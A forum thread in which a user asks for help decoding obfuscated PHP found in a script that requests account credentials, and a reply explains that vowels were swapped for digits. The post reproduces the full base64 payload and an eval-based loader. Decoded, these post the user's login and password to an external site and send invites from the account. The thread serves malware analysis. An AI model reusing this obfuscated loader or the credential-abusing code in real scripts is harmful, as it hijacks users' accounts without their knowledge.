Jump to content

Can Someone Decode This?


dzhax
 Share

Recommended Posts

I found a script I want to use, but it entails entering account information for a site. So obviously I am going to look through it and make sure its not a phishing attempt on my info. While I was doing this i found this $_X=''; and what appears to be a base64 encoded string. So I base64 decoded it and it doesn't look right still...The code in the script:

if(isset($_GET['e'])) {	$_F=__FILE__;	$_X='Pz48P3BocA0KZjNuY3Q0Mm4gczVuZEludjR0NSgkNW0xNGxzKSB7DQoJDQoJJG15RjRsNSA9ICJjMjNudC50eHQiOw0KCSRmaCA9IGYycDVuKCRteUY0bDUsICdyJyk7DQoJNGYoZjRsNXM0ejUoJG15RjRsNSkgPT0gMCkgew0KCQkkYzIzbnQgPSAwOw0KCX0gNWxzNSB7DQoJCSRjMjNudCA9IGZyNTFkKCRmaCwgZjRsNXM0ejUoJG15RjRsNSkpOw0KCQlmY2wyczUoJGZoKTsNCgl9DQoJDQoJDQoJNGYoKCgkYzIzbnQgJSBpKSA9PSAwKSAmJiAoJGMyM250ICE9IDApKSB7DQoJCQlyNXQzcm4gZjRsNV9nNXRfYzJudDVudHMoImh0dHA6Ly93d3cuNTFybnB0ei5jMm0vNG52NHQ1LnBocD81PSIuJDVtMTRscyk7DQoJfSA1bHM1IHsNCg0KCQkkMWc1bnQgPSAiTTJ6NGxsMS9pLjAgKE0xYzRudDJzaDsgVTsgSW50NWwgTTFjIE9TIFggNjBfZV82OyA1bi1VUykgQXBwbDVXNWJLNHQvaW9hLmkgKEtIVE1MLCBsNGs1IEc1Y2syKSBDaHIybTUvdS4wLmF1OS51OSBTMWYxcjQvaW9hLmkiOyANCg0KCQkkcDJzdDNybCA9ICJodHRwOi8vd3d3LmwyY2s1cnouYzJtLzEzdGgvbDJnNG4iOyANCgkJJHI1ZjVycjVyID0gImh0dHA6Ly93d3cubDJjazVyei5jMm0iOw0KDQoJCSRwMnN0NHQgPSAxcnIxeSgicjVtNW1iNXJfbTUiID0+ICIybiIsDQoJCQkiaDFuZGw1IiA9PiBMX0xPR0lOLA0KCQkJInAxc3N3MnJkIiA9PiBMX1BBU1NXT1JELA0KCQkpOw0KDQoJCSRjMjJrNDVfZjRsNV9wMXRoID0gImMyMms0NS50eHQiOw0KDQoJCSRjaCA9IGMzcmxfNG40dCgpOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfVkVSQk9TRSwgNik7DQoJCWMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9VUkwsICRwMnN0M3JsKTsNCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX1VTRVJBR0VOVCwgJDFnNW50KTsNCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgNik7DQoJCWMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9QT1NULCB0cjM1KTsNCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX1BPU1RGSUVMRFMsICRwMnN0NHQpOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDYpOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfRk9MTE9XTE9DQVRJT04sIDYpOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfTUFYUkVESVJTLCBpMCk7DQoJCWMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9SRUZFUkVSLCAkcjVmNXJyNXIpOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfU1NMX1ZFUklGWVBFRVIsIEZBTFNFKTsNCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX0NPT0tJRUZJTEUsICRjMjJrNDVfZjRsNV9wMXRoKTsNCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX0NPT0tJRUpBUiwgJGMyMms0NV9mNGw1X3AxdGgpOw0KCQkkcjVzM2x0ID0gYzNybF81eDVjKCRjaCk7DQoJCTNuczV0KCRjaCk7DQoNCgkJNGYoc3Ryc3RyKCRyNXMzbHQsICJTNGduMjN0IikgPT0gRkFMU0Upew0KCQkJcjV0M3JuICJkMnduIjsNCgkJfQ0KDQoJCSRwMnN0M3JsID0gImh0dHA6Ly93d3cubDJjazVyei5jMm0vNG52NHQxdDQybi9zNW5kXzVtMTRsXzRudjR0NXMiOyANCgkJJHI1ZjVycjVyID0gImh0dHA6Ly93d3cubDJjazVyei5jMm0vYzJubjVjdCI7DQoNCgkJJHAyc3Q0dCA9IDFycjF5KCI1bTE0bHMiID0+ICIkNW0xNGxzIiwNCgkJCSJtNXNzMWc1IiA9PiBMX01FU1NBR0UNCgkJKTsNCg0KCQkkY2ggPSBjM3JsXzRuNHQoKTsgDQoJCWMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9WRVJCT1NFLCA2KTsNCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX1VSTCwgJHAyc3QzcmwpOyANCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX1VTRVJBR0VOVCwgJDFnNW50KTsgDQoJCWMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIDYpOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfUE9TVCwgNik7IA0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfUE9TVEZJRUxEUywgJHAyc3Q0dCk7DQoJCWMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgNik7IA0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfRk9MTE9XTE9DQVRJT04sIDYpOyANCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX01BWFJFRElSUywgaTApOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfUkVGRVJFUiwgJHI1ZjVycjVyKTsgDQoJCWMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZUEVFUiwgRkFMU0UpOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfQ09PS0lFRklMRSwgJGMyMms0NV9mNGw1X3AxdGgpOyANCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX0NPT0tJRUpBUiwgJGMyMms0NV9mNGw1X3AxdGgpOyANCgkJJHI1czNsdCA9IGMzcmxfNXg1YygkY2gpOyANCgkJM25zNXQoJGNoKTsgDQoNCgkJNGYoc3Ryc3RyKCRyNXMzbHQsICJzM2NjNXNzIikgPT0gVFJVRSl7DQoJCQkkbXlGNGw1ID0gImMyM250LnR4dCI7DQoJCQkkZmggPSBmMnA1bigkbXlGNGw1LCAndycpIDJyIGQ0NSgiQzFuJ3QgMnA1biBjMjNudC50eHQiKTsNCgkJCSRjMjNudCsrOw0KCQkJJHN0cjRuZ0QxdDEgPSAkYzIzbnQ7DQoJCQlmd3I0dDUoJGZoLCAkc3RyNG5nRDF0MSkgMnIgZDQ1KCJDMW4ndCAzcGQxdDUgYzIzbnQudHh0Iik7DQoJCQlmY2wyczUoJGZoKTsNCgkJCXI1dDNybiAiczVudCI7DQoJCX0gNWxzNSB7DQoJCQlyNXQzcm4gIjFscjUxZHkiOw0KCQl9DQoJfQ0KDQp9DQo/Pg==';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));	$result = sendInvite($_GET['e']);

My attempt to decode:

<? echo base64_decode("Pz48P3BocA0KZjNuY3Q0Mm4gczVuZEludjR0NSgkNW0xNGxzKSB7DQoJDQoJJG15RjRsNSA9ICJjMjNudC50eHQiOw0KCSRmaCA9IGYycDVuKCRteUY0bDUsICdyJyk7DQoJNGYoZjRsNXM0ejUoJG15RjRsNSkgPT0gMCkgew0KCQkkYzIzbnQgPSAwOw0KCX0gNWxzNSB7DQoJCSRjMjNudCA9IGZyNTFkKCRmaCwgZjRsNXM0ejUoJG15RjRsNSkpOw0KCQlmY2wyczUoJGZoKTsNCgl9DQoJDQoJDQoJNGYoKCgkYzIzbnQgJSBpKSA9PSAwKSAmJiAoJGMyM250ICE9IDApKSB7DQoJCQlyNXQzcm4gZjRsNV9nNXRfYzJudDVudHMoImh0dHA6Ly93d3cuNTFybnB0ei5jMm0vNG52NHQ1LnBocD81PSIuJDVtMTRscyk7DQoJfSA1bHM1IHsNCg0KCQkkMWc1bnQgPSAiTTJ6NGxsMS9pLjAgKE0xYzRudDJzaDsgVTsgSW50NWwgTTFjIE9TIFggNjBfZV82OyA1bi1VUykgQXBwbDVXNWJLNHQvaW9hLmkgKEtIVE1MLCBsNGs1IEc1Y2syKSBDaHIybTUvdS4wLmF1OS51OSBTMWYxcjQvaW9hLmkiOyANCg0KCQkkcDJzdDNybCA9ICJodHRwOi8vd3d3LmwyY2s1cnouYzJtLzEzdGgvbDJnNG4iOyANCgkJJHI1ZjVycjVyID0gImh0dHA6Ly93d3cubDJjazVyei5jMm0iOw0KDQoJCSRwMnN0NHQgPSAxcnIxeSgicjVtNW1iNXJfbTUiID0+ICIybiIsDQoJCQkiaDFuZGw1IiA9PiBMX0xPR0lOLA0KCQkJInAxc3N3MnJkIiA9PiBMX1BBU1NXT1JELA0KCQkpOw0KDQoJCSRjMjJrNDVfZjRsNV9wMXRoID0gImMyMms0NS50eHQiOw0KDQoJCSRjaCA9IGMzcmxfNG40dCgpOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfVkVSQk9TRSwgNik7DQoJCWMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9VUkwsICRwMnN0M3JsKTsNCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX1VTRVJBR0VOVCwgJDFnNW50KTsNCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgNik7DQoJCWMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9QT1NULCB0cjM1KTsNCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX1BPU1RGSUVMRFMsICRwMnN0NHQpOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDYpOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfRk9MTE9XTE9DQVRJT04sIDYpOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfTUFYUkVESVJTLCBpMCk7DQoJCWMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9SRUZFUkVSLCAkcjVmNXJyNXIpOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfU1NMX1ZFUklGWVBFRVIsIEZBTFNFKTsNCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX0NPT0tJRUZJTEUsICRjMjJrNDVfZjRsNV9wMXRoKTsNCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX0NPT0tJRUpBUiwgJGMyMms0NV9mNGw1X3AxdGgpOw0KCQkkcjVzM2x0ID0gYzNybF81eDVjKCRjaCk7DQoJCTNuczV0KCRjaCk7DQoNCgkJNGYoc3Ryc3RyKCRyNXMzbHQsICJTNGduMjN0IikgPT0gRkFMU0Upew0KCQkJcjV0M3JuICJkMnduIjsNCgkJfQ0KDQoJCSRwMnN0M3JsID0gImh0dHA6Ly93d3cubDJjazVyei5jMm0vNG52NHQxdDQybi9zNW5kXzVtMTRsXzRudjR0NXMiOyANCgkJJHI1ZjVycjVyID0gImh0dHA6Ly93d3cubDJjazVyei5jMm0vYzJubjVjdCI7DQoNCgkJJHAyc3Q0dCA9IDFycjF5KCI1bTE0bHMiID0+ICIkNW0xNGxzIiwNCgkJCSJtNXNzMWc1IiA9PiBMX01FU1NBR0UNCgkJKTsNCg0KCQkkY2ggPSBjM3JsXzRuNHQoKTsgDQoJCWMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9WRVJCT1NFLCA2KTsNCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX1VSTCwgJHAyc3QzcmwpOyANCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX1VTRVJBR0VOVCwgJDFnNW50KTsgDQoJCWMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIDYpOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfUE9TVCwgNik7IA0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfUE9TVEZJRUxEUywgJHAyc3Q0dCk7DQoJCWMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgNik7IA0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfRk9MTE9XTE9DQVRJT04sIDYpOyANCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX01BWFJFRElSUywgaTApOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfUkVGRVJFUiwgJHI1ZjVycjVyKTsgDQoJCWMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZUEVFUiwgRkFMU0UpOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfQ09PS0lFRklMRSwgJGMyMms0NV9mNGw1X3AxdGgpOyANCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX0NPT0tJRUpBUiwgJGMyMms0NV9mNGw1X3AxdGgpOyANCgkJJHI1czNsdCA9IGMzcmxfNXg1YygkY2gpOyANCgkJM25zNXQoJGNoKTsgDQoNCgkJNGYoc3Ryc3RyKCRyNXMzbHQsICJzM2NjNXNzIikgPT0gVFJVRSl7DQoJCQkkbXlGNGw1ID0gImMyM250LnR4dCI7DQoJCQkkZmggPSBmMnA1bigkbXlGNGw1LCAndycpIDJyIGQ0NSgiQzFuJ3QgMnA1biBjMjNudC50eHQiKTsNCgkJCSRjMjNudCsrOw0KCQkJJHN0cjRuZ0QxdDEgPSAkYzIzbnQ7DQoJCQlmd3I0dDUoJGZoLCAkc3RyNG5nRDF0MSkgMnIgZDQ1KCJDMW4ndCAzcGQxdDUgYzIzbnQudHh0Iik7DQoJCQlmY2wyczUoJGZoKTsNCgkJCXI1dDNybiAiczVudCI7DQoJCX0gNWxzNSB7DQoJCQlyNXQzcm4gIjFscjUxZHkiOw0KCQl9DQoJfQ0KDQp9DQo/Pg==';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=="); ?>

My Result:

?> "2n", "h1ndl5" => L_LOGIN, "p1ssw2rd" => L_PASSWORD, ); $c22k45_f4l5_p1th = "c22k45.txt"; $ch = c3rl_4n4t(); c3rl_s5t2pt($ch, CURLOPT_VERBOSE, 6); c3rl_s5t2pt($ch, CURLOPT_URL, $p2st3rl); c3rl_s5t2pt($ch, CURLOPT_USERAGENT, $1g5nt); c3rl_s5t2pt($ch, CURLOPT_HEADER, 6); c3rl_s5t2pt($ch, CURLOPT_POST, tr35); c3rl_s5t2pt($ch, CURLOPT_POSTFIELDS, $p2st4t); c3rl_s5t2pt($ch, CURLOPT_RETURNTRANSFER, 6); c3rl_s5t2pt($ch, CURLOPT_FOLLOWLOCATION, 6); c3rl_s5t2pt($ch, CURLOPT_MAXREDIRS, i0); c3rl_s5t2pt($ch, CURLOPT_REFERER, $r5f5rr5r); c3rl_s5t2pt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); c3rl_s5t2pt($ch, CURLOPT_COOKIEFILE, $c22k45_f4l5_p1th); c3rl_s5t2pt($ch, CURLOPT_COOKIEJAR, $c22k45_f4l5_p1th); $r5s3lt = c3rl_5x5c($ch); 3ns5t($ch); 4f(strstr($r5s3lt, "S4gn23t") == FALSE){ r5t3rn "d2wn"; } $p2st3rl = "http://www.l2ck5rz.c2m/4nv4t1t42n/s5nd_5m14l_4nv4t5s"; $r5f5rr5r = "http://www.l2ck5rz.c2m/c2nn5ct"; $p2st4t = 1rr1y("5m14ls" => "$5m14ls", "m5ss1g5" => L_MESSAGE ); $ch = c3rl_4n4t(); c3rl_s5t2pt($ch, CURLOPT_VERBOSE, 6); c3rl_s5t2pt($ch, CURLOPT_URL, $p2st3rl); c3rl_s5t2pt($ch, CURLOPT_USERAGENT, $1g5nt); c3rl_s5t2pt($ch, CURLOPT_HEADER, 6); c3rl_s5t2pt($ch, CURLOPT_POST, 6); c3rl_s5t2pt($ch, CURLOPT_POSTFIELDS, $p2st4t); c3rl_s5t2pt($ch, CURLOPT_RETURNTRANSFER, 6); c3rl_s5t2pt($ch, CURLOPT_FOLLOWLOCATION, 6); c3rl_s5t2pt($ch, CURLOPT_MAXREDIRS, i0); c3rl_s5t2pt($ch, CURLOPT_REFERER, $r5f5rr5r); c3rl_s5t2pt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); c3rl_s5t2pt($ch, CURLOPT_COOKIEFILE, $c22k45_f4l5_p1th); c3rl_s5t2pt($ch, CURLOPT_COOKIEJAR, $c22k45_f4l5_p1th); $r5s3lt = c3rl_5x5c($ch); 3ns5t($ch); 4f(strstr($r5s3lt, "s3cc5ss") == TRUE){ $myF4l5 = "c23nt.txt"; $fh = f2p5n($myF4l5, 'w') 2r d45("C1n't 2p5n c23nt.txt"); $c23nt++; $str4ngD1t1 = $c23nt; fwr4t5($fh, $str4ngD1t1) 2r d45("C1n't 3pd1t5 c23nt.txt"); fcl2s5($fh); r5t3rn "s5nt"; } 5ls5 { r5t3rn "1lr51dy"; } } } ?>¯jVÚ±î¸uç(uâEõƒÖ&6ScEöFV6öFR‚Eõ‚“²Eõƒ×7G'G"‚Eõ‚Âs#3CSf÷V–RrÂv÷V–S#3CSbr“²Eõ#ÖW&Vu÷&WÆ6R‚uõôd”ÄUõòrÂ"r"âEôbâ"r"ÂEõ‚“¶Wf‚Eõ"“²Eõ#Ó²EõƒÓ°

The majority of it is readable but the very end and what appears to be random number replacement....I didn't even see anywhere in the script that is decoding...Any help appreciated.EDIT: On second thought after looking at my post just now i notices a decode at the end of that long line... lets see what that says :)OK found out that that last line of gibberish was a decode statment tacked on the end of the line.

$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;

Edited by dzhax
Link to comment
Share on other sites

What exactly are you looking for help with?It looks like just character replacement. You can see here:p1ssw2rdthat 1=a and 2=o. So you could substitute that in here:c22k45_f4l5_p1thto get:cook45_f4l5_pathI'm going to guess that 4=i and 5=e, to give "cookie_file_path".I know that this is curl_init:$ch = c3rl_4n4t();So then 3=u.So apparently they replaced the vowels with 1-5. You can go through that code and replace everything yourself if you want to see it. There's a second eval on the bottom of what you decoded, make sure you echo that also.

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share

×
×
  • Create New...